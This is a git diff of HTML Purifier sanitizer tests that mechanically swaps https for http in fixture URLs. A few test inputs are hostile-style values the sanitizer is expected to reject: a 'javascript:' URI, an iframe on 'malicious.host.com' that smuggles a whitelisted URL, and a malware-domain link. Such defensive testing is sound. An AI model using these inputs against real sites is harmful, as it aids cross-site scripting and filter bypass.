b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge.htmlt index c5568ee..a74e37a 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge.htmlt @@ -8,11 +8,11 @@ URI.AllowedSchemes = http,ftp,file <a href="///google.com">foo</a> <a href="////google.com">foo</a> -<a href="https:google.com">foo</a> -<a href="https:/google.com">foo</a> -<a href="https://google.com">foo</a> -<a href="https:///google.com">foo</a> -<a href="https:////google.com">foo</a> +<a href="http:google.com">foo</a> +<a href="http:/google.com">foo</a> +<a href="http://google.com">foo</a> +<a href="http:///google.com">foo</a> +<a href="http:////google.com">foo</a> <a href="ftp:google.com">foo</a> <a href="ftp:/google.com">foo</a> diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt index 1c73b1c..b17fab9 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt @@ -1,8 +1,8 @@ --INI-- HTML.SafeIframe = true -URI.SafeIframeRegexp = "%^https://maps.google.com/%" +URI.SafeIframeRegexp = "%^http://maps.google.com/%" --HTML-- -<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> +<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> --EXPECT-- -<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> +<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt index 522a355..d4e5e12 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt @@ -1,7 +1,7 @@ --INI-- HTML.SafeIframe = true --HTML-- -<iframe src="https://www.example.com/"></iframe> +<iframe src="http://www.example.com/"></iframe> --EXPECT-- <iframe></iframe> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt index 90c74ec..a9f6839 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt @@ -1,8 +1,8 @@ --INI-- HTML.SafeIframe = true -URI.SafeIframeRegexp = "%^https://www.youtube.com/embed/%" +URI.SafeIframeRegexp = "%^http://www.youtube.com/embed/%" --HTML-- -<iframe title="YouTube video player" width="480" height="390" src="https://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0" allowfullscreen></iframe> +<iframe title="YouTube video player" width="480" height="390" src="http://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0" allowfullscreen></iframe> --EXPECT-- -<iframe title="YouTube video player" width="480" height="390" src="https://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0"></iframe> +<iframe title="YouTube video player" width="480" height="390" src="http://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0"></iframe> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt index aa19484..de2b606 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt @@ -1,14 +1,14 @@ --INI-- HTML.SafeIframe = true -URI.SafeIframeRegexp = "%(^https://www.example.com/|^https?://dev.example.com/)%" +URI.SafeIframeRegexp = "%(^http://www.example.com/|^https?://dev.example.com/)%" --HTML-- -<iframe src="https://www.example.com/"></iframe> -<iframe src="https://malicious.host.com/?https://www.example.com/"></iframe> -<iframe src="https://dev.example.com/"></iframe> +<iframe src="http://www.example.com/"></iframe> +<iframe src="http://malicious.host.com/?http://www.example.com/"></iframe> +<iframe src="http://dev.example.com/"></iframe> <iframe src="https://dev.example.com/"></iframe> --EXPECT-- -<iframe src="https://www.example.com/"></iframe> +<iframe src="http://www.example.com/"></iframe> <iframe></iframe> -<iframe src="https://dev.example.com/"></iframe> +<iframe src="http://dev.example.com/"></iframe> <iframe src="https://dev.example.com/"></iframe> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt index 3f3ae0d..552c0d7 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt @@ -6,7 +6,7 @@ HTML.SafeEmbed = true URI.Munge = "/redirect.php?url=%s&check=%t" URI.MungeSecretKey = "foo" --HTML-- -<object width="425" height="344"><param name="movie" value="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> +<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> --EXPECT-- -<object width="425" height="344" data="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> +<object width="425" height="344" data="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt index 0961df8..8bd7e7f 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt @@ -2,7 +2,7 @@ HTML.SafeObject = true HTML.SafeEmbed = true --HTML-- -<object width="425" height="344"><param name="movie" value="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> +<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> --EXPECT-- -<object width="425" height="344" data="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="https://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> +<object width="425" height="344" data="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/secure-munge.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/secure-munge.htmlt index f94daf8..77018eb 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/secure-munge.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/secure-munge.htmlt @@ -4,9 +4,9 @@ return !function_exists('hash_hmac'); URI.Munge = "/redirect.php?url=%s&check=%t" URI.MungeSecretKey = "foo" --HTML-- -<a href="https://localhost">foo</a> -<img src="https://localhost" alt="local" /> +<a href="http://localhost">foo</a> +<img src="http://localhost" alt="local" /> --EXPECT-- <a href="/redirect.php?url=http%3A%2F%2Flocalhost&check=c0efad89696082f5cb925d28636b0f4260f346391c92c70c8e9eba72591c2a73">foo</a> -<img src="https://localhost" alt="local" /> +<img src="http://localhost" alt="local" /> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/DisplayLinkURITest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/DisplayLinkURITest.php index 163d62a..9547e32 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/DisplayLinkURITest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/DisplayLinkURITest.php @@ -12,8 +12,8 @@ class HTMLPurifier_Injector_DisplayLinkURITest extends HTMLPurifier_InjectorHarn public function testBasicLink() { $this->assertResult( - '<a href="https://malware.example.com">Don\'t go here!</a>', - '<a>Don\'t go here!</a> (https://malware.example.com)' + '<a href="http://malware.example.com">Don\'t go here!</a>', + '<a>Don\'t go here!</a> (http://malware.example.com)' ); } @@ -27,8 +27,8 @@ class HTMLPurifier_Injector_DisplayLinkURITest extends HTMLPurifier_InjectorHarn public function testEmptyText() { $this->assertResult( - '<a href="https://malware.example.com"></a>', - '<a></a> (https://malware.example.com)' + '<a href="http://malware.example.com"></a>', + '<a></a> (http://malware.example.com)' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/LinkifyTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/LinkifyTest.php index 8e0cfca..b0f6cc6 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/LinkifyTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/LinkifyTest.php @@ -12,31 +12,31 @@ class HTMLPurifier_Injector_LinkifyTest extends HTMLPurifier_InjectorHarness public function testLinkifyURLInRootNode() { $this->assertResult( - 'https://example.com', - '<a href="https://example.com">https://example.com</a>' + 'http://example.com', + '<a href="http://example.com">http://example.com</a>' ); } public function testLinkifyURLInInlineNode() { $this->assertResult( - '<b>https://example.com</b>', - '<b><a href="https://example.com">https://example.com</a></b>' + '<b>http://example.com</b>', + '<b><a href="http://example.com">http://example.com</a></b>' ); } public function testBasicUsageCase() { $this->assertResult( - 'This URL https://example.com is what you need', - 'This URL <a href="https://example.com">https://example.com</a> is what you need' + 'This URL http://example.com is what you need', + 'This URL <a href="http://example.com">http://example.com</a> is what you need' ); } public function testIgnoreURLInATag() { $this->assertResult( - '<a>https://example.com/</a>' + '<a>http://example.com/</a>' ); } @@ -44,20 +44,20 @@ class HTMLPurifier_Injector_LinkifyTest extends HTMLPurifier_InjectorHarness { $this->config->set('HTML.Allowed', 'b'); $this->expectError('Cannot enable Linkify injector because a is not allowed'); - $this->assertResult('https://example.com/'); + $this->assertResult('http://example.com/'); } public function testExcludes() { - $this->assertResult('<a><span>https://example.com</span></a>'); + $this->assertResult('<a><span>http://example.com</span></a>'); } public function testRegexIsSmart() { - $this->assertResult('https://example.com/foo.', '<a href="https://example.com/foo">https://example.com/foo</a>.'); - $this->assertResult('“https://example.com/foo”', '“<a href="https://example.com/foo">https://example.com/foo</a>”'); - $this->assertResult('“https://example.com”', '“<a href="https://example.com">https://example.com</a>”'); - $this->assertResult('(https://example.com/f(o)o)', '(<a href="https://example.com/f(o)o">https://example.com/f(o)o</a>)'); + $this->assertResult('http://example.com/foo.', '<a href="http://example.com/foo">http://example.com/foo</a>.'); + $this->assertResult('“http://example.com/foo”', '“<a href="http://example.com/foo">http://example.com/foo</a>”'); + $this->assertResult('“http://example.com”', '“<a href="http://example.com">http://example.com</a>”'); + $this->assertResult('(http://example.com/f(o)o)', '(<a href="http://example.com/f(o)o">http://example.com/f(o)o</a>)'); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/RemoveEmptyTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/RemoveEmptyTest.php index 0d79a42..8b5dc49 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/RemoveEmptyTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Injector/RemoveEmptyTest.php @@ -105,14 +105,14 @@ class HTMLPurifier_Injector_RemoveEmptyTest extends HTMLPurifier_InjectorHarness public function testNoRemoveIframe() { $this->config->set('HTML.SafeIframe', true); - $this->assertResult('<iframe src="https://google.com"></iframe>', ''); + $this->assertResult('<iframe src="http://google.com"></iframe>', ''); } public function testRemoveDisallowedIframe() { $this->config->set('HTML.SafeIframe', true); - $this->config->set('URI.SafeIframeRegexp', '%^https://www.youtube.com/embed/%'); - $this->assertResult('<iframe src="https://google.com"></iframe>', ''); + $this->config->set('URI.SafeIframeRegexp', '%^http://www.youtube.com/embed/%'); + $this->assertResult('<iframe src="http://google.com"></iframe>', ''); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/LanguageTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/LanguageTest.php index ae881aa..a7b4f83 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/LanguageTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/LanguageTest.php @@ -48,8 +48,8 @@ class HTMLPurifier_LanguageTest extends HTMLPurifier_Harness $lang->messages['LanguageTest: Element info'] = 'Element Token: $1.Name, $1.Serialized, $1.Compact, $1.Line'; $lang->messages['LanguageTest: Data info'] = 'Data Token: $1.Data, $1.Serialized, $1.Compact, $1.Line'; $this->assertIdentical($lang->formatMessage('LanguageTest: Element info', - array(1=>new HTMLPurifier_Token_Start('a', array('href'=>'https://example.com'), 18))), - 'Element Token: a, <a href="https://example.com">, <a>, 18'); + array(1=>new HTMLPurifier_Token_Start('a', array('href'=>'http://example.com'), 18))), + 'Element Token: a, <a href="http://example.com">, <a>, 18'); $this->assertIdentical($lang->formatMessage('LanguageTest: Data info', array(1=>new HTMLPurifier_Token_Text('data>', 23))), 'Data Token: data>, data>, data>, 23'); diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/LexerTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/LexerTest.php index b53a215..cbad271 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/LexerTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/LexerTest.php @@ -179,8 +179,8 @@ class HTMLPurifier_LexerTest extends HTMLPurifier_Harness $this->assertExtractBody( '<?xml version="1.0" <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>xyz</title> </head> @@ -627,8 +627,8 @@ class HTMLPurifier_LexerTest extends HTMLPurifier_Harness public function test_tokenizeHTML_emptyTagWithSlashInAttribute() { $this->assertTokenization( - '<param name="src" value="https://example.com/video.wmv" />', - array( new HTMLPurifier_Token_Empty('param', array('name' => 'src', 'value' => 'https://example.com/video.wmv')) ) + '<param name="src" value="http://example.com/video.wmv" />', + array( new HTMLPurifier_Token_Empty('param', array('name' => 'src', 'value' => 'http://example.com/video.wmv')) ) ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php index 5ed9359..b37e200 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php @@ -46,7 +46,7 @@ class HTMLPurifier_Strategy_MakeWellFormed_InjectorTest extends HTMLPurifier_Str { $this->config->set('HTML.Allowed', 'a,p'); $this->expectError('Cannot enable Linkify injector because a.href is not allowed'); - $this->assertResult('<p>https://example.com</p>'); + $this->assertResult('<p>http://example.com</p>'); } public function testOnlyAutoParagraph() @@ -60,62 +60,62 @@ class HTMLPurifier_Strategy_MakeWellFormed_InjectorTest extends HTMLPurifier_Str public function testParagraphWrappingOnlyLink() { $this->assertResult( - 'https://example.com', - '<p><a href="https://example.com">https://example.com</a></p>' + 'http://example.com', + '<p><a href="http://example.com">http://example.com</a></p>' ); } public function testParagraphWrappingNodeContainingLink() { $this->assertResult( - '<b>https://example.com</b>', - '<p><b><a href="https://example.com">https://example.com</a></b></p>' + '<b>http://example.com</b>', + '<p><b><a href="http://example.com">http://example.com</a></b></p>' ); } public function testParagraphWrappingPoorlyFormedNodeContainingLink() { $this->assertResult( - '<b>https://example.com', - '<p><b><a href="https://example.com">https://example.com</a></b></p>' + '<b>http://example.com', + '<p><b><a href="http://example.com">http://example.com</a></b></p>' ); } public function testTwoParagraphsContainingOnlyOneLink() { $this->assertResult( - "https://example.com\n\nhttps://dev.example.com", -'<p><a href="https://example.com">https://example.com</a></p> + "http://example.com\n\nhttp://dev.example.com", +'<p><a href="http://example.com">http://example.com</a></p> -<p><a href="https://dev.example.com">https://dev.example.com</a></p>' +<p><a href="http://dev.example.com">http://dev.example.com</a></p>' ); } public function testParagraphNextToDivWithLinks() { $this->assertResult( - 'https://example.com <div>https://example.com</div>', -'<p><a href="https://example.com">https://example.com</a> </p> + 'http://example.com <div>http://example.com</div>', +'<p><a href="http://example.com">http://example.com</a> </p> -<div><a href="https://example.com">https://example.com</a></div>' +<div><a href="http://example.com">http://example.com</a></div>' ); } public function testRealisticLinkInSentence() { $this->assertResult( - 'This URL https://example.com is what you need', - '<p>This URL <a href="https://example.com">https://example.com</a> is what you need</p>' + 'This URL http://example.com is what you need', + '<p>This URL <a href="http://example.com">http://example.com</a> is what you need</p>' ); } public function testParagraphAfterLinkifiedURL() { $this->assertResult( -"https://google.com +"http://google.com <b>b</b>", -"<p><a href=\"https://google.com\">https://google.com</a></p> +"<p><a href=\"http://google.com\">http://google.com</a></p> <p><b>b</b></p>" ); diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php index 2e7421b..d06b76b 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php @@ -71,7 +71,7 @@ class HTMLPurifier_Strategy_ValidateAttributesTest extends public function testBasicURI() { - $this->assertResult('<a href="https://www.google.com/">Google</a>'); + $this->assertResult('<a href="http://www.google.com/">Google</a>'); } public function testInvalidURI() diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIDefinitionTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIDefinitionTest.php index 83afcfe..c193e53 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIDefinitionTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIDefinitionTest.php @@ -38,7 +38,7 @@ class HTMLPurifier_URIDefinitionTest extends HTMLPurifier_URIHarness public function test_setupMemberVariables_collisionPrecedenceIsHostBaseScheme() { $this->config->set('URI.Host', $host = 'example.com'); - $this->config->set('URI.Base', $base = 'https://sub.example.com/foo/bar.html'); + $this->config->set('URI.Base', $base = 'http://sub.example.com/foo/bar.html'); $this->config->set('URI.DefaultScheme', 'ftp'); $def = new HTMLPurifier_URIDefinition(); $def->setup($this->config); @@ -57,7 +57,7 @@ class HTMLPurifier_URIDefinitionTest extends HTMLPurifier_URIHarness public function test_setupMemberVariables_onlyBase() { - $this->config->set('URI.Base', 'https://sub.example.com/foo/bar.html'); + $this->config->set('URI.Base', 'http://sub.example.com/foo/bar.html'); $def = new HTMLPurifier_URIDefinition(); $def->setup($this->config); $this->assertIdentical($def->host, 'sub.example.com'); diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php index 4ef0893..a6b216f 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php @@ -16,7 +16,7 @@ class HTMLPurifier_URIFilter_DisableExternalResourcesTest extends { $this->context->destroy('EmbeddedURI'); // undo setUp $this->assertFiltering( - 'https://example.com' + 'http://example.com' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalTest.php index 4aabfb9..e86a769 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/DisableExternalTest.php @@ -12,7 +12,7 @@ class HTMLPurifier_URIFilter_DisableExternalTest extends HTMLPurifier_URIFilterH public function testRemoveExternal() { $this->assertFiltering( - 'https://example.com', false + 'http://example.com', false ); } @@ -27,7 +27,7 @@ class HTMLPurifier_URIFilter_DisableExternalTest extends HTMLPurifier_URIFilterH { $this->config->set('URI.Host', 'example.com'); $this->assertFiltering( - 'https://example.com' + 'http://example.com' ); } @@ -35,7 +35,7 @@ class HTMLPurifier_URIFilter_DisableExternalTest extends HTMLPurifier_URIFilterH { $this->config->set('URI.Host', 'example.com'); $this->assertFiltering( - 'https://www.example.com' + 'http://www.example.com' ); } @@ -43,15 +43,15 @@ class HTMLPurifier_URIFilter_DisableExternalTest extends HTMLPurifier_URIFilterH { $this->config->set('URI.Host', 'www.example.com'); $this->assertFiltering( - 'https://example.com', false + 'http://example.com', false ); } public function testBaseAsHost() { - $this->config->set('URI.Base', 'https://www.example.com/foo/bar'); + $this->config->set('URI.Base', 'http://www.example.com/foo/bar'); $this->assertFiltering( - 'https://www.example.com/baz' + 'http://www.example.com/baz' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php index c9fab68..ff8a556 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php @@ -12,20 +12,20 @@ class HTMLPurifier_URIFilter_HostBlacklistTest extends HTMLPurifier_URIFilterHar public function testRejectBlacklistedHost() { $this->config->set('URI.HostBlacklist', 'example.com'); - $this->assertFiltering('https://example.com', false); + $this->assertFiltering('http://example.com', false); } public function testRejectBlacklistedHostThoughNotTrue() { // maybe this behavior should change $this->config->set('URI.HostBlacklist', 'example.com'); - $this->assertFiltering('https://example.comcast.com', false); + $this->assertFiltering('http://example.comcast.com', false); } public function testPreserveNonBlacklistedHost() { $this->config->set('URI.HostBlacklist', 'example.com'); - $this->assertFiltering('https://google.com'); + $this->assertFiltering('http://google.com'); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php index e4dba42..9e8f930 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php @@ -10,7 +10,7 @@ class HTMLPurifier_URIFilter_MakeAbsoluteTest extends HTMLPurifier_URIFilterHarn $this->setBase(); } - public function setBase($base = 'https://example.com/foo/bar.html?q=s#frag') + public function setBase($base = 'http://example.com/foo/bar.html?q=s#frag') { $this->config->set('URI.Base', $base); } @@ -19,17 +19,17 @@ class HTMLPurifier_URIFilter_MakeAbsoluteTest extends HTMLPurifier_URIFilterHarn public function testPreserveAbsolute() { - $this->assertFiltering('https://example.com/foo.html'); + $this->assertFiltering('http://example.com/foo.html'); } public function testFilterBlank() { - $this->assertFiltering('', 'https://example.com/foo/bar.html?q=s'); + $this->assertFiltering('', 'http://example.com/foo/bar.html?q=s'); } public function testFilterEmptyPath() { - $this->assertFiltering('?q=s#frag', 'https://example.com/foo/bar.html?q=s#frag'); + $this->assertFiltering('?q=s#frag', 'http://example.com/foo/bar.html?q=s#frag'); } public function testPreserveAltScheme() @@ -44,67 +44,67 @@ class HTMLPurifier_URIFilter_MakeAbsoluteTest extends HTMLPurifier_URIFilterHarn public function testFilterIgnoreHTTPSpecialCase() { - $this->assertFiltering('https:/', 'https://example.com/'); + $this->assertFiltering('http:/', 'http://example.com/'); } public function testFilterAbsolutePath() { - $this->assertFiltering('/foo.txt', 'https://example.com/foo.txt'); + $this->assertFiltering('/foo.txt', 'http://example.com/foo.txt'); } public function testFilterRelativePath() { - $this->assertFiltering('baz.txt', 'https://example.com/foo/baz.txt'); + $this->assertFiltering('baz.txt', 'http://example.com/foo/baz.txt'); } public function testFilterRelativePathWithInternalDot() { - $this->assertFiltering('./baz.txt', 'https://example.com/foo/baz.txt'); + $this->assertFiltering('./baz.txt', 'http://example.com/foo/baz.txt'); } public function testFilterRelativePathWithEndingDot() { - $this->assertFiltering('baz/.', 'https://example.com/foo/baz/'); + $this->assertFiltering('baz/.', 'http://example.com/foo/baz/'); } public function testFilterRelativePathDot() { - $this->assertFiltering('.', 'https://example.com/foo/'); + $this->assertFiltering('.', 'http://example.com/foo/'); } public function testFilterRelativePathMultiDot() { - $this->assertFiltering('././foo/./bar/.././baz', 'https://example.com/foo/foo/baz'); + $this->assertFiltering('././foo/./bar/.././baz', 'http://example.com/foo/foo/baz'); } public function testFilterAbsolutePathWithDot() { - $this->assertFiltering('/./foo', 'https://example.com/foo'); + $this->assertFiltering('/./foo', 'http://example.com/foo'); } public function testFilterAbsolutePathWithMultiDot() { - $this->assertFiltering('/./foo/../bar/.', 'https://example.com/bar/'); + $this->assertFiltering('/./foo/../bar/.', 'http://example.com/bar/'); } public function testFilterRelativePathWithInternalDotDot() { - $this->assertFiltering('../baz.txt', 'https://example.com/baz.txt'); + $this->assertFiltering('../baz.txt', 'http://example.com/baz.txt'); } public function testFilterRelativePathWithEndingDotDot() { - $this->assertFiltering('..', 'https://example.com/'); + $this->assertFiltering('..', 'http://example.com/'); } public function testFilterRelativePathTooManyDotDots() { - $this->assertFiltering('../../', 'https://example.com/'); + $this->assertFiltering('../../', 'http://example.com/'); } public function testFilterAppendingQueryAndFragment() { - $this->assertFiltering('/foo.php?q=s#frag', 'https://example.com/foo.php?q=s#frag'); + $this->assertFiltering('/foo.php?q=s#frag', 'http://example.com/foo.php?q=s#frag'); } // edge cases below @@ -154,16 +154,16 @@ class HTMLPurifier_URIFilter_MakeAbsoluteTest extends HTMLPurifier_URIFilterHarn public function testRemoveJavaScriptWithEmbeddedLink() { // credits: NykO18 - $this->setBase('https://www.example.com/'); - $this->assertFiltering('javascript: window.location = \'https://www.example.com\';', false); + $this->setBase('http://www.example.com/'); + $this->assertFiltering('javascript: window.location = \'http://www.example.com\';', false); } // miscellaneous public function testFilterDomainWithNoSlash() { - $this->setBase('https://example.com'); - $this->assertFiltering('foo', 'https://example.com/foo'); + $this->setBase('http://example.com'); + $this->assertFiltering('foo', 'http://example.com/foo'); } // error case diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MungeTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MungeTest.php index a244b1b..9496171 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MungeTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIFilter/MungeTest.php @@ -9,7 